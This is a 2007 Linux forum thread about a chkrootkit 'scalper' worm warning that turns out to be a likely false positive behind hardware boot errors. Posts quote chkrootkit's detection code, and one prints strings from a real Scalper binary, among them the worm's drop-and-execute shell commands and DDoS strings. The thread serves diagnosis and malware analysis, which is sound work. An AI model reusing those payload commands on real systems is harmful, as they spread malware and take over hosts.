LinuxQuestions.org
Old 06-23-2007, 03:04 PM   #1
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Rep: Reputation: 15
Scalper worm, Fedora 7


After a lengthy process of trying to identify the cause of a crc error and a coincidental "chkrootkit" report that my Clevo laptop was infected with the "scalper" worm, I came to the conclusion that the source of the crc error was incompatible ram. I am still at a loss, however, why chkrootkit reported the infection, since the scalper worm affects only BSD and my system is Fedora. The comments below are now for historical reference in case someone else has a similar problem.

Question: How do you get the "scalper" worm written for BSD when you are running Fedora?

Possible answer: Own a laptop computer with a nifty built in webcam you hope to get working. Google the web looking for programs and drivers to make it possible. Download a program in source code that won't compile without other files required to satisfy dependencies. Go looking for the necessary files and download them from the web. Extract and install. Grab a driver too. Oh, did I fail to say some of the files are BSD .rpms? So what, they are rpms and install without any complaint.

Next time you run "chkrootkit", lo and behold - it reports there is a "scalper" worm installed. Maybe. Or, it may have been something else incorrectly identified as the "scalper".

Consequence? Following the next shut-down the computer will not boot. Attempts to use the rescue disk fail. Don't know what to look for anyway. Using the install disks to attempt an "update" doesn't work either, even though my objective is simply to update the boot configuration. Doesn't work because there is no kernel update required. Shouldn't there be some way to force an update or simply change the boot configuration via the install disks? Maybe there is and I'm revealing my ignorance.

Tried a new install without formatting the "home" and "Keepers" file systems to save files I didn't want to lose. Result? The installation always failed at "post configuration" and installation of "grub". Tried using a "System Rescue" CD (not the Fedora 7 rescue CD) to repair the boot and file allocation tables. Unsuccessful.

Employed a "freedos" CD to delete the Linux partitions (consequently losing my aforementioned files - if I can't use a file recovery program to save them, and if they haven't already been written over). They aren't critical files anyway. Just music and such. Running "freedos" from the CD created a DOS partition, reformatted, installed the sys files and "freedos".

Using the "System Rescue" CD (not the Fedora 7 rescue CD), deleted all data in the F.A.T., installed an empty dos F.A.T. and using the utility saved "freedos" into it.

Finally managed using "freedos" to enable one of the two disks to boot up. Maybe I can get Fedora 7 to install now. Pending. Update to follow.

svarmido

Lesson(s)? Lots of them.

Last edited by svarmido; 11-14-2007 at 12:31 PM. Reason: Update
 
Old 06-23-2007, 04:25 PM   #2
jschiwal
Guru
 
Registered: Aug 2001
Location: Fargo, ND
Distribution: SuSE AMD64
Posts: 15,733

Rep: Reputation: 654
The scalper worm is an internet worm that exploits unpatched apache web servers running on BSD. I doubt that it would cause the problems you are seeing now because you are trying to reinstall from read-only media. Unless you have a virus that infects the bios, reformatting and reinstalling will eliminate anything you had before. You may have drive or media problems instead that led you to the wrong conclusion. You might want to post the url of the bsd rpm file that you downloaded so that someone can examine it. Theoretically, if that server was compromised, a hacker might have repackaged an rpm with their own version. It installs binaries after all, but the signature of the rpm will change as a result. So the hacker will also change the signature, but it won't match that from a 3rd party source.
 
Old 06-23-2007, 06:21 PM   #3
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,524
Blog Entries: 51

Rep: Reputation: 2601
Quote:
Next time you run "chkrootkit", lo and behold - it reports there is a "scalper" worm installed. Maybe. Or, it may have been something else incorrectly identified as the "scalper".
Like jschiwal said: most likely Something Else. From chkrootkit-0.47a:
Code:
scalper (){
   # the two indicators chkrootkit-0.47a looks for
   SCALPER_FILES="${ROOTDIR}tmp/.uua ${ROOTDIR}tmp/.a"
   SCALPER_PORT=2001
   OPT=-an
   STATUS=0

   # any socket bound to 0.0.0.0:2001 in "netstat -an" output trips the check
   if ${netstat} "${OPT}" | ${egrep} "0.0:${SCALPER_PORT} "> /dev/null 2>&1; then
      STATUS=1
   fi
   # so does the presence of either drop file
   for i in ${SCALPER_FILES}; do
      if [ -f ${i} ]; then
         STATUS=1
      fi
   done
   if [ ${STATUS} -eq 1 ] ;then
      echo "Warning: Possible Scalper Worm installed"
   else
      if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
      return ${NOT_INFECTED}
   fi
}
This shows it'll trip on either a) TCP port 2001 OR b) any files called /tmp/.uua or /tmp/.a . In the case of the TCP port, reliance on static port-to-service mappings (Nmap's services file or /etc/services) isn't infallible. Looking for open files for that PID and interrogating the service should show more info. If you haven't been running a stale version of Apache then I doubt it'd trip on the /tmp files thing. In any case the chance the probs you're experiencing are linked to anything in the Scalper MO is zilch.
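As an added example (not code from the thread or from chkrootkit), the same two indicators re-created in Python, followed by the triage step unSpawn describes: map the socket bound to port 2001 back to the PID that owns it via /proc/net/tcp and /proc/<pid>/fd, so the analyst checks that process's /proc/<pid>/exe instead of trusting a port number. The netstat and /proc/net/tcp lines are constructed samples; live_fd_inode_map only does anything on a Linux host.

```python
"""Added example, not chkrootkit's own code: the scalper() heuristic re-created
in Python, plus the triage step of mapping the port-2001 listener to its PID.
Sample netstat and /proc/net/tcp text below is constructed."""
import os
import re
from typing import Dict, Iterable, List, Optional

SCALPER_FILES = ("/tmp/.uua", "/tmp/.a")
SCALPER_PORT = 2001
TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp


def scalper_indicators(netstat_text: str, present_files: Iterable[str]) -> List[str]:
    """The two tests chkrootkit-0.47a runs: egrep "netstat -an" output for
    '0.0:2001 ' (dot left unescaped, as in the original) and look for the
    two drop files. Returns the indicators that tripped (empty list = clean)."""
    hits = []
    if re.search("0.0:%d " % SCALPER_PORT, netstat_text):
        hits.append("listener on port %d" % SCALPER_PORT)
    present = set(present_files)
    for path in SCALPER_FILES:
        if path in present:
            hits.append("file %s exists" % path)
    return hits


def listen_inode(proc_net_tcp: str, port: int) -> Optional[int]:
    """Parse /proc/net/tcp (hex ip:port columns) and return the socket inode
    of the LISTEN entry on `port`, or None if nothing listens there."""
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 10:
            continue
        local, state, inode = fields[1], fields[3], fields[9]
        if state == TCP_LISTEN and int(local.split(":")[1], 16) == port:
            return int(inode)
    return None


def live_fd_inode_map() -> Dict[int, List[int]]:
    """Collect socket inodes per PID from /proc/<pid>/fd on a live Linux host
    (root is needed to see other users' processes)."""
    result: Dict[int, List[int]] = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        fd_dir = "/proc/%s/fd" % pid
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:
            continue  # process exited, or not ours to inspect
        inodes = [int(l[8:-1]) for l in links if l.startswith("socket:[")]
        if inodes:
            result[int(pid)] = inodes
    return result


def owner_of_listener(proc_net_tcp: str, fd_map: Dict[int, List[int]], port: int) -> Optional[int]:
    """PID holding the socket that listens on `port`, or None."""
    inode = listen_inode(proc_net_tcp, port)
    if inode is None:
        return None
    return next((pid for pid, inodes in fd_map.items() if inode in inodes), None)


# Constructed sample: a harmless daemon (PID 4242) bound to 0.0.0.0:2001 and no
# drop files present. chkrootkit would still print "Possible Scalper Worm".
SAMPLE_NETSTAT = "tcp        0      0 0.0.0.0:2001            0.0.0.0:*               LISTEN\n"
SAMPLE_PROC_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:07D1 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 31337 1\n"
)
SAMPLE_FD_MAP = {1: [9001], 4242: [31337, 31338]}

if __name__ == "__main__":
    print("indicators:", scalper_indicators(SAMPLE_NETSTAT, []))
    pid = owner_of_listener(SAMPLE_PROC_NET_TCP, SAMPLE_FD_MAP, SCALPER_PORT)
    print("port %d belongs to PID %s; inspect /proc/%s/exe and cmdline" % (SCALPER_PORT, pid, pid))
```

On a real host, pass `live_fd_inode_map()` and the contents of /proc/net/tcp to `owner_of_listener` and read that PID's exe link before deciding whether the warning means anything.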
 
Old 06-23-2007, 09:31 PM   #4
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
A mere coincidence?

chkrootkit reported an installed scalper worm. Then my laptop failed to boot on the next attempt. Subsequent attempts to reinstall Fedora 7 failed at the point where "post-install" and/or "grub" install occurred. Once, the new install appeared to have succeeded, but the next boot stopped with nothing appearing but "grub" and a prompt. Accepting there is no correlation between them is hard to do. Unfortunately, deleted partitions and reformatting will make it difficult, but probably not impossible if they have not yet been over-written, to identify suspect files. I feel somewhat responsible to try - but admit a lack of motivation. I downloaded the "spca1" driver. I downloaded a gnome conferencing type program similar to Ekiga that required compilation and had lots of dependencies. "conference?" Every attempt at compilation, after downloading and installing a dependency, only mentioned a new missing dependency. All missing dependencies were not mentioned at the same time. See this post: http://www.linuxquestions.org/questi...d.php?t=561014. The only other possible variable is I used the "Smart package manager" to update my system and install additional programs during the session prior to the boot failure.

There were no apparent booting issues or other warnings prior to this.

I use Clamav, rkhunter and chkrootkit regularly. I check logs and messages for possible anomalies regularly.

Thanks for your input.

svarmido
 
Old 06-24-2007, 03:58 AM   #5
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: None (src & compile)
Posts: 253

Rep: Reputation: 36
Unless Fedora has a program interpreter
/usr/libexec/ld-elf.so.1

this binary was not running. You didn't say the Scalper variant, but I'll assume they use similar dynamic loaders.

Code:
[jayjwa@atr2:~>] f-prot apch1.a -wrap 
Virus scanning report  -  24 June 2007 @ 4:22

F-PROT ANTIVIRUS
Program version: 4.6.7
Engine version: 3.16.15

VIRUS SIGNATURE FILES
SIGN.DEF
 created 22 June 2007
SIGN2.DEF created 22 June 2007
MACRO.DEF created 22 June 2007

Search: apch1.a
Action: Report only
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER -WRAP

/home/jayjwa/apch1.a  Infection: Unix/Scalper.C

Results of virus scanning:

Files: 1
MBRs: 0
Boot sectors: 0
Objects scanned: 1
Infected: 1
Suspicious: 0
Disinfected: 0
Deleted: 0
Renamed: 0

Time: 0:00
Exit 3
[jayjwa@atr2:~>] readelf -S apch1.a
There are 25 section headers, starting at offset 0xb3d0:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        080480f4 0000f4 000019 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048110 000110 000018 00   A  0   0  4
  [ 3] .hash             HASH            08048128 000128 000248 04   A  4   0  4
  [ 4] .dynsym           DYNSYM          08048370 000370 0004d0 10   A  5   1  4
  [ 5] .dynstr           STRTAB          08048840 000840 00024d 00   A  0   0  1
  [ 6] .rel.plt          REL             08048a90 000a90 000200 08   A  4   8  4
  [ 7] .init             PROGBITS        08048c90 000c90 00000b 00  AX  0   0  4
  [ 8] .plt              PROGBITS        08048c9c 000c9c 000410 04  AX  0   0  4
  [ 9] .text             PROGBITS        080490ac 0010ac 0091f8 00  AX  0   0  4
  [10] .fini             PROGBITS        080522a4 00a2a4 000006 00  AX  0   0  4
  [11] .rodata           PROGBITS        080522c0 00a2c0 000ba0 00   A  0   0 32
  [12] .data             PROGBITS        08053e60 00ae60 000200 00  WA  0   0 32
  [13] .eh_frame         PROGBITS        08054060 00b060 000004 00  WA  0   0  4
  [14] .ctors            PROGBITS        08054064 00b064 000008 00  WA  0   0  4
  [15] .dtors            PROGBITS        0805406c 00b06c 000008 00  WA  0   0  4
  [16] .got              PROGBITS        08054074 00b074 00010c 04  WA  0   0  4
  [17] .dynamic          DYNAMIC         08054180 00b180 000070 08  WA  5   0  4
  [18] .sbss             PROGBITS        080541f0 00b200 000000 00   W  0   0  1
  [19] .bss              NOBITS          08054200 00b200 0044d8 00  WA  0   0 32
  [20] .comment          PROGBITS        00000000 00b200 0000c8 00      0   0  1
  [21] .note             NOTE            00000000 00b2c8 000050 00      0   0  1
  [22] .shstrtab         STRTAB          00000000 00b318 0000b5 00      0   0  1
  [23] .symtab           SYMTAB          00000000 00b7b8 000c40 10     24  51  4
  [24] .strtab           STRTAB          00000000 00c3f8 0005b2 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings)
  I (info), L (link order), G (group), x (unknown)
  O (extra OS processing required) o (OS specific), p (processor specific)
[jayjwa@atr2:~>] objdump -s -j .interp apch1.a

apch1.a:     file format elf32-i386-freebsd

Contents of section .interp:
 80480f4 2f757372 2f6c6962 65786563 2f6c642d  /usr/libexec/ld-
 8048104 656c662e 736f2e31 00                 elf.so.1.
Besides this, chkrootkit is known to have frequent false-positives. This variant also opens a "/bin/.log" file (or is coded to).

Some interesting strings:

Code:
/bin/.log
Invalid instance or socket
Operation Success
Unable to resolve
Unable to connect
Unable to create socket
Unable to bind socket
Port is in use
Operation pending
Unknown
webmaster@mydomain.com
.hlp
.gov
find / -type f
/proc
/dev
/bin
http://
Cookie2: $Version="1"
Cookie: %s
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
GET /%s HTTP/1.0
Host: %s
Accept: text/html, text/plain, text/sgml, */*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.4rel.1 libwww-FM/2.14
HTTP
Set-Cookie
Location
FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)
GET / HTTP/1.1
Server: 
/tmp/.a
begin 655 .a
Apache
POST / HTTP/1.1
Host: Unknown
Transfer-Encoding: chunked
rm -rf /tmp/.a;cat > /tmp/.uua << __eof__;
__eof__
/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a %s;exit;
12.127.17.71
%c%s
HELO %s
MAIL FROM:<%s>
RCPT TO:<%s>
DATA
QUIT
Return-Path: <%c%c%c%c%c%c%c@aol.com>
From: %s
Message-ID: <%x.%x.%x@aol.com>
Date: %s
Subject: %s
To: %s
Mime-Version: 1.0
Content-Type: text/html
/dev/null
%s <base 1> [base 2] ...
Error: %s
Insufficient memory
%d.%d.%d.%d
Unknown 24-06-2002 APC
Unable to execute command
127.0.0.1
Unable to connect to host
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
/tmp/tmp
Unable to open temporary file for writing
Error communicating with website
Timed out while receiving data
UNKNOWN-CHECKSUM-SUCCESSFUL
Checksum for data failed
mv /tmp/tmp /tmp/init;export PATH="/tmp";init %s
/bin/sh
Size must be less than or equal to 9216
Cannot packet local networks
Udp flooding target
Tcp flooding target
Sending packets to target
Dns flooding target
Invalid IP
----FROM----
----SUBJECT----
----DATA----
----EMAILS----

Quote:
Finally managed using "freedos" to enable one of the two disks to boot up. Maybe I can get Fedora 7 to install now. Pending. Update to follow.
Your boot troubles are possibly one or more of the following:
  • Partition table setup wrong; possibly not marked bootable. Freedos probably does this itself, which would explain its success.
  • You didn't write a bootable kernel and/or boot loader to the disk you wanted to boot.
  • The boot loader's config was wrong.
  • The kernel you wanted to boot the new system off of lacked the compiled-in drivers needed to access the disks and such. Install kernels usually have everything but the kitchen sink compiled in, while the actual kernel you'd use to be the system kernel might lack these drivers.

In any case, it sounds a lot like my first Linux installs, when I didn't fully grasp the lay-out Linux needed.
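As an added example (not jayjwa's code, nor any real tool's), a small Python ELF reader that extracts the two facts his readelf and objdump output rests on: the OS ABI byte in e_ident and the PT_INTERP program interpreter path. The image it parses is constructed to mirror what readelf reported for apch1.a (ELF32, i386, interpreter /usr/libexec/ld-elf.so.1) and is not the real binary; the same parser handles 64-bit and big-endian files.

```python
"""Added example: read a suspect ELF's OS ABI and PT_INTERP interpreter so it
can be told whether the binary could even load on this host. The sample ELF
bytes are constructed here, not taken from the real apch1.a."""
import os
import struct
from typing import Dict, Optional

PT_INTERP = 3
OSABI_NAMES = {0: "UNIX - System V", 2: "NetBSD", 3: "GNU/Linux",
               6: "Solaris", 9: "FreeBSD", 12: "OpenBSD"}
MACHINE_NAMES = {3: "i386", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def describe_elf(data: bytes) -> Dict[str, object]:
    """Parse the ELF header and program headers (ELF32/ELF64, either byte
    order) and return class, OS ABI, machine and the interpreter path."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = 32 if data[4] == 1 else 64          # EI_CLASS
    end = "<" if data[5] == 1 else ">"         # EI_DATA: 1 = little-endian
    osabi = data[7]                            # EI_OSABI
    if bits == 32:
        hdr = struct.unpack_from(end + "HHIIIIIHHHHHH", data, 16)
        ph_fmt = end + "IIIIIIII"              # type off vaddr paddr filesz memsz flags align
    else:
        hdr = struct.unpack_from(end + "HHIQQQIHHHHHH", data, 16)
        ph_fmt = end + "IIQQQQQQ"              # type flags off vaddr paddr filesz memsz align
    e_machine, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[4], hdr[8], hdr[9]
    interp: Optional[str] = None
    for i in range(e_phnum):
        ph = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        if ph[0] != PT_INTERP:
            continue
        off, size = (ph[1], ph[4]) if bits == 32 else (ph[2], ph[5])
        interp = data[off:off + size].split(b"\0", 1)[0].decode("ascii", "replace")
        break
    return {"bits": bits,
            "osabi": OSABI_NAMES.get(osabi, "unknown(%d)" % osabi),
            "machine": MACHINE_NAMES.get(e_machine, "unknown(%d)" % e_machine),
            "interp": interp}


def interpreter_present(info: Dict[str, object]) -> bool:
    """True only if this host has the dynamic loader the binary asks for;
    without it the kernel refuses to exec the file at all."""
    return bool(info["interp"]) and os.path.exists(str(info["interp"]))


def build_sample_elf(interp: bytes = b"/usr/libexec/ld-elf.so.1\0", osabi: int = 9) -> bytes:
    """Construct a minimal ELF32 i386 executable with a single PT_INTERP
    segment (constructed sample shaped like readelf's report on apch1.a)."""
    ident = b"\x7fELF" + bytes([1, 1, 1, osabi]) + b"\0" * 8      # 16 bytes
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, 52, 0, 0,
                               52, 32, 1, 40, 0, 0)                # 52 bytes
    phdr = struct.pack("<IIIIIIII", PT_INTERP, 84, 0x80480F4, 0x80480F4,
                       len(interp), len(interp), 4, 1)            # 32 bytes, data at 84
    return ehdr + phdr + interp


if __name__ == "__main__":
    info = describe_elf(build_sample_elf())
    print(info)
    print("loader present on this host:", interpreter_present(info))
```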
 
Old 06-24-2007, 06:29 AM   #6
v00d00101
Member
 
Registered: Jun 2003
Location: UK
Distribution: Fedora 8, Centos 5.1
Posts: 480

Rep: Reputation: 30
If all else fails, zero the drive and start again.

I doubt you have contracted a boot sector virus. It's more likely you have misconfigured something, or your hard drive was on its way out to start with. Either is fixable with time and a little new knowledge.
 
Old 06-25-2007, 03:50 PM   #7
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
crc error

Update:

The computer is a D9T, a.k.a. D900T, marketed by several different vendors. Will accommodate two sata drives.

A clarification is in order. After noticing the report by "chkrootkit" that a scalper worm was installed and shutting down my system - my attempt to reboot was not a total failure. I received a message at the time, the only part of which I recalled was *****system halted*****.

Subsequently, after fresh re-installs (only one in the computer at a time), neither of two sata drives, one 80 gig and the other 100 gig, would boot beyond this message, "crc error *****system halted*****", so I grabbed my HPze4805us to search the net for other instances where this has occurred. 99.99% of them were associated with issues related to Linux installations. I didn't even use Linux or anything related to Linux in my search terms. Tired, defective disks? Overheating? Incompatible memory? One possibility mentioned is a defective .iso image used for installation. Other discussions were about the kernel and boot configurations - Grub and Lilo.

My install went well using an apparently good .iso image and install disk before this happened; and, since there were no changes (I am aware of) to either disk after the original installation - the installation disk and original partition plan are improbable sources for the problem.

Memory? I recently installed 1X2 gigs of Kingston DDR2 ram. There were no immediate problems I can attribute to the ram upgrade.

I removed both upgrade modules and the crc error issue remained. I did not yet try after removing the remaining 512mb module...

Overheating should not be an issue for a computer just turned on and booted...

So, I believe there are only three remaining issues to consider (an over simplification or unjustified optimism?). The just completed update using the smart package manager; other files downloaded, compiled or installed (rpms).

Then there is the chkrootkit thing. While attempting repairs to the F.A.T. using the System Rescue Program (not the rescue program included with the install disk), there was a report that the disk - 100GB showed only 93GB. Recommendation was to check jumpers, etc.... What jumpers? Besides, at that point I had only removed Freedos from the F.A.T. and not yet reformatted and repartitioned the drive.

Would it be unreasonable to suspect a virus or worm has managed to affect both hard drives - and remains installed somewhere on both, consuming disk space?

I wiped the 100GB drive using "shred" before re-installing Fedora 7. This did not resolve the crc error.

One last bit of information. After wiping the drive, I kept the home partition from the last install hoping to save files I prefer not to lose. Consequently, there was some unused space remaining between the boot and home partitions. My plan was to resize the home partition or simply do a new install after having copied the files to a CD. Must the partitions be entirely contiguous?

My bad?

The worst possibility is that the original cause has been compounded by subsequent attempts at resolving the problem.

Ideas and recommendations are welcome.

svarmido
 
Old 06-25-2007, 04:27 PM   #8
TigerOC
Senior Member
 
Registered: Jan 2003
Location: Devon, UK
Distribution: Debian Etc/kernel 2.6.18-4K7
Posts: 2,380

Rep: Reputation: 49
Download the disk manufacturer's diagnostic disks. They will boot independently of an os and run diagnostics on the drives. It would seem unlikely that both disks would fail simultaneously but you never know. It is also possible that the hard drive controller on the motherboard is faulty or the sata cable is faulty (swap out the cable(s) with new ones). These kinds of faults give rise to the disks being incorrectly formatted and the file system would also be corrupt and therefore be non-accessible.

Last edited by TigerOC; 06-25-2007 at 04:28 PM.
 
Old 06-28-2007, 12:30 PM   #9
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
more information

Thanks.

I'll fetch the manufacturer's drive diagnostic tool and report the results later.

Over the last couple of days I have experienced the same problem trying to install Fedora Core 6, Gentoo from a live CD or Fedora 7. The install either stops at the post install configuration, or if I was lucky enough to get grub installed - still received the crc error, system halted.

Output was:

"sb_read failed reading block 0x79b
unable to read page, block 1e1b3c, size 545f
SQUASHFS error:zlib_inflate returned unexpected result 0xffffffffd, src length 65536, avail_in 0, avail_out 2"

Other errors of this type vary in their output but are of the same type.

Install media checks out o.k. Anyway, would you receive a crc error, system halted message if a cdrom/dvd drive was failing? I doubt it.

svarmido
 
Old 07-14-2007, 06:26 PM   #10
svarmido
Member
 
Registered: Apr 2006
Posts: 78

Original Poster
Rep: Reputation: 15
Moving over to Software/Hardware Forums....

Moving over to Hardware and Software threads. I no longer consider this a security issue - which isn't to say the bios has not been affected by something I downloaded. Much else has been ruled out.

svarmido
 
Old 07-15-2007, 09:04 AM   #11
Crito
Senior Member
 
Registered: Nov 2003
Location: Knoxville, TN
Distribution: Kubuntu 9.04
Posts: 1,168

Rep: Reputation: 53
Quote:
Originally Posted by svarmido
Memory? I recently installed 1X2 gigs of Kingston DDR2 ram. There were no immediate problems I can attribute to the ram upgrade.

I removed both upgrade modules and the crc error issue remained. I did not yet try after removing the remaining 512mb module...
It's a process of elimination and thus far you haven't actually eliminated anything. Test all the memory with a LiveCD like Ultimate Boot or System Rescue. Then and only then can you declare "that's not it" and move on to the next possibility.
 
Old 07-15-2007, 11:36 AM   #12
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,524
Blog Entries: 51

Rep: Reputation: 2601
Moved: This thread (by now) is more suitable in the Hardware forum and has been moved accordingly to help your thread/question get the exposure it deserves.
 